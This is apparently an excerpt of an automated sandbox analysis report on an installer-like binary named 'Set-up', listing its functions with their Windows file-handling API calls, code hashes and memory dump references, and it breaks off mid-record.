                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                  • Opcode ID: 2cc585ab597ad01a01dfad9020f2690889e466d38275e3b0ede9bf71359f175d
                                                                                                                                                  • Instruction ID: 9d746e993147214d5a2332e31db93adbe562cb9d8aee7da9d812ee40ac2ed53d
                                                                                                                                                  • Opcode Fuzzy Hash: 2cc585ab597ad01a01dfad9020f2690889e466d38275e3b0ede9bf71359f175d
                                                                                                                                                  • Instruction Fuzzy Hash: 5E51B3346042C5DFDF218F6CC880BEA7BB0AF12304F14C49BE8599B762D3799995CB5A
                                                                                                                                                  Function 004099FB Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409A00
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000105,?,00000000,00000000,0047A410,00000000), ref: 00409ADA
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • GetFullPathNameA.KERNEL32(?,00000105,?,?,00000000,0047A410,00000000), ref: 00409A52
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000001,?,00000000,00000003,?,00000105,?,00000000,00000000,0047A410,00000000), ref: 00409B3A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FullNamePath$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3081200611-0
                                                                                                                                                  • Opcode ID: 4c59ee69e0e36cab85bd991f8581f094e7d8d07a04ac3ad142a52dad17706e6c
                                                                                                                                                  • Instruction ID: 7146501a08d6027fff48b43c4e9eab51290b9d7e30f3f241cd9f8ca66e81a9f2
                                                                                                                                                  • Opcode Fuzzy Hash: 4c59ee69e0e36cab85bd991f8581f094e7d8d07a04ac3ad142a52dad17706e6c
                                                                                                                                                  • Instruction Fuzzy Hash: C6414571D00119ABCF14EFA5D8909EEB7B9FF48314F10407EE505B32A2DA786E45CB99
                                                                                                                                                  Function 0046FEB0 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0046FF77
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                  • Opcode ID: 0f92a8873e158599e04940a362c6e084964f23b0a974cf43dcfc5b1bc1e7f636
                                                                                                                                                  • Instruction ID: 959ecac357f90b6e94e115ad0648054278f424796ac0cfcceba33cec68e4b4b5
                                                                                                                                                  • Opcode Fuzzy Hash: 0f92a8873e158599e04940a362c6e084964f23b0a974cf43dcfc5b1bc1e7f636
                                                                                                                                                  • Instruction Fuzzy Hash: 6451AE31900248EFCB15CF68D980ADE7BB4FF42354F2085ABF9599B251E734DA44CB6A
                                                                                                                                                  Function 004093FF Relevance: 6.1, APIs: 4, Instructions: 89fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409404
                                                                                                                                                  • MoveFileW.KERNEL32 ref: 00409466
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • MoveFileA.KERNEL32(?,?), ref: 0040943A
                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 004094BD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileMove$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 853508918-0
                                                                                                                                                  • Opcode ID: 736d9f1afaeb037f8b31ed64d0f3b7106c0593550f732573afc36924af4a2274
                                                                                                                                                  • Instruction ID: e3512f0d833de681bd09933fb321b968525b37ccca3024f146b310d41422dadd
                                                                                                                                                  • Opcode Fuzzy Hash: 736d9f1afaeb037f8b31ed64d0f3b7106c0593550f732573afc36924af4a2274
                                                                                                                                                  • Instruction Fuzzy Hash: 67316D72C05119ABCF10EFA2D8419DEFB75AF44314F14417FE801B3292DA386E068B6A
                                                                                                                                                  Function 0040AAAE Relevance: 6.1, APIs: 4, Instructions: 75fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040AAB3
                                                                                                                                                    • Part of subcall function 0040AB7F: CloseHandle.KERNEL32(00000000,?,0040AAC3,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AB8A
                                                                                                                                                  • CreateFileA.KERNEL32(?,0047A410,?,00000000,0040A5CF,00000000,00000000,?,?,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AAF6
                                                                                                                                                  • CreateFileW.KERNEL32(?,0047A410,?,00000000,0040A5CF,00000000,00000000,?,?,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AB1A
                                                                                                                                                  • CreateFileW.KERNEL32(00000000,0047A410,?,00000000,0040A5CF,00000000,00000000,00000003,?,?,000000FF,00000000,0040A5CF,?,0047A410), ref: 0040AB59
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$H_prolog$CloseHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 676520261-0
                                                                                                                                                  • Opcode ID: 86f4e81dc93824d7c46348972d9933c6224fd0ab569247d401f5cd845de6055a
                                                                                                                                                  • Instruction ID: dcb3871ed3aaa8bc079bef57250c330be7cd77665cfe38c32a438c7c710b4f7f
                                                                                                                                                  • Opcode Fuzzy Hash: 86f4e81dc93824d7c46348972d9933c6224fd0ab569247d401f5cd845de6055a
                                                                                                                                                  • Instruction Fuzzy Hash: F5216D7280020AEFCF11AFA4CC41DEEBB76FF18354F10852AFA55662A0C3359961DBA5
                                                                                                                                                  Function 004092B0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004092B5
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,0047ADD8,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004092FA
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • SetFileAttributesA.KERNEL32(?,?,?,?,0047ADD8,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004092DB
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,00000003,?,?,?,?,0047ADD8), ref: 0040932F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3790360811-0
                                                                                                                                                  • Opcode ID: c9461dcf8d122dd9941bf0465e5b9027c4103411b57b206f823c83a88d801f8f
                                                                                                                                                  • Instruction ID: 83891075d981374b52900cfa024e04e629bc59cc3293a3040c9dcaea295da159
                                                                                                                                                  • Opcode Fuzzy Hash: c9461dcf8d122dd9941bf0465e5b9027c4103411b57b206f823c83a88d801f8f
                                                                                                                                                  • Instruction Fuzzy Hash: 56119372D00205ABCF10AFA59C01AAFBB79EF88714F10447BED01B32D2D6385E45CBA6
                                                                                                                                                  Function 0040979B Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004097A0
                                                                                                                                                    • Part of subcall function 004092B0: __EH_prolog.LIBCMT ref: 004092B5
                                                                                                                                                    • Part of subcall function 004092B0: SetFileAttributesA.KERNEL32(?,?,?,?,0047ADD8,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004092DB
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,0047ADD8,?,00000003,?,00000000,00000000,004907E0), ref: 004097EC
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,0047ADD8,?,00000003,?,00000000,00000000,004907E0), ref: 004097CE
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000003,?,?,?,0047ADD8,?,00000003,?,00000000,00000000,004907E0), ref: 0040981D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$DeleteH_prolog$Attributes
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 750130383-0
                                                                                                                                                  • Opcode ID: 59ce6ae6250a74cf461dbcb047a61ae6a17c6e0c154726cb7cfbface33d0f927
                                                                                                                                                  • Instruction ID: cb9977e7b7d18198cc811f869ceeb51dadf8b7e3b2ba656bb1bca8becf47311c
                                                                                                                                                  • Opcode Fuzzy Hash: 59ce6ae6250a74cf461dbcb047a61ae6a17c6e0c154726cb7cfbface33d0f927
                                                                                                                                                  • Instruction Fuzzy Hash: AE11BF77D042059BCB10BFA588824AEBB71AF41314F14817FE90173292DB395E45DAAA
                                                                                                                                                  Function 00456D00 Relevance: 6.1, APIs: 4, Instructions: 61threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,00491278,?,00000000), ref: 00456D12
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00456D2B
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000004,?,00000000), ref: 00456D54
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00456D6D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$CountCounterPerformanceProcessQueryThreadTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1503542204-0
                                                                                                                                                  • Opcode ID: 060a1cf1ac6a0994894468fa00480d641d38a66179f2bf5c6fdd12283c075dfe
                                                                                                                                                  • Instruction ID: c982d0a7d4415f08ef8abe0cd6e448120289f0f5775d04f5d4af2b5bbda5b55f
                                                                                                                                                  • Opcode Fuzzy Hash: 060a1cf1ac6a0994894468fa00480d641d38a66179f2bf5c6fdd12283c075dfe
                                                                                                                                                  • Instruction Fuzzy Hash: B11193716583018BD300EF21D845A9FB7E0BBD471DF400A5DF585571A5FA389A0CCB9B
                                                                                                                                                  Function 0040935D Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409362
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,0047ADD8), ref: 004093A3
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,0047ADD8), ref: 00409385
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00000003,?,?,?,00000000,?,?,?,?,?,0047ADD8), ref: 004093D4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectoryRemove$H_prolog
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2658828398-0
                                                                                                                                                  • Opcode ID: 36107e62ad45085b914355cf90d4affddab6953883a8f77d2198d1b0ee264f32
                                                                                                                                                  • Instruction ID: d1da797a504595ed1083792eb2147ab4ee9b24da5ecfc2fa1597d06b484361f4
                                                                                                                                                  • Opcode Fuzzy Hash: 36107e62ad45085b914355cf90d4affddab6953883a8f77d2198d1b0ee264f32
                                                                                                                                                  • Instruction Fuzzy Hash: 05119E72D042059BCF14AFA598825AEBB75EB88314B14017FED01B32D2DA391E419EAB
                                                                                                                                                  Function 0040907C Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409081
                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,8007000E,00000000,00000000,?,00000000), ref: 004090A5
                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000000,8007000E,00000000,00000000,?,00000000), ref: 004090E8
                                                                                                                                                  • LocalFree.KERNEL32(8007000E,8007000E,?,00000000,8007000E,00000000,00000000,?,00000000), ref: 00409103
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FormatMessage$FreeH_prologLocal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3392428314-0
                                                                                                                                                  • Opcode ID: 69e784f9b47eaf2f12e2bb8b9a88344fb08df0d92d1e98353e72a9d84c5acf3b
                                                                                                                                                  • Instruction ID: 98f290f5104c03dd8f4eac26dee39a19fbe72a341dea40fa8d0f42760e5e7e43
                                                                                                                                                  • Opcode Fuzzy Hash: 69e784f9b47eaf2f12e2bb8b9a88344fb08df0d92d1e98353e72a9d84c5acf3b
                                                                                                                                                  • Instruction Fuzzy Hash: CB11E57190411AAFDF11AFA5DC559EFBB78EB44308F00843AF411721D2DA391E05DA6A
                                                                                                                                                  Function 0042E99D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 324COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: wR@$B
                                                                                                                                                  • API String ID: 3519838083-3713363123
                                                                                                                                                  • Opcode ID: 00df599a7a8a904bd7761fb45e38ec4b6e81f4c876f2b19ac37386cd7dc30d82
                                                                                                                                                  • Instruction ID: 42fe2a43f264cd8ed5438544ec66d3a06d45344f5a2f24256b7261776e65373e
                                                                                                                                                  • Opcode Fuzzy Hash: 00df599a7a8a904bd7761fb45e38ec4b6e81f4c876f2b19ac37386cd7dc30d82
                                                                                                                                                  • Instruction Fuzzy Hash: F8D19C70B002299FDF24DFA6D885BEEBBB1BF48304F64446EE406A7341D778A941CB59
                                                                                                                                                  Function 004172F7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 261COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004172FC
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0048BA9C,?,00000004,00000004,?,00000000,00000000), ref: 00417476
                                                                                                                                                  Strings
                                                                                                                                                  • Can not create output directory , xrefs: 00417487
                                                                                                                                                  Memory Dump Source
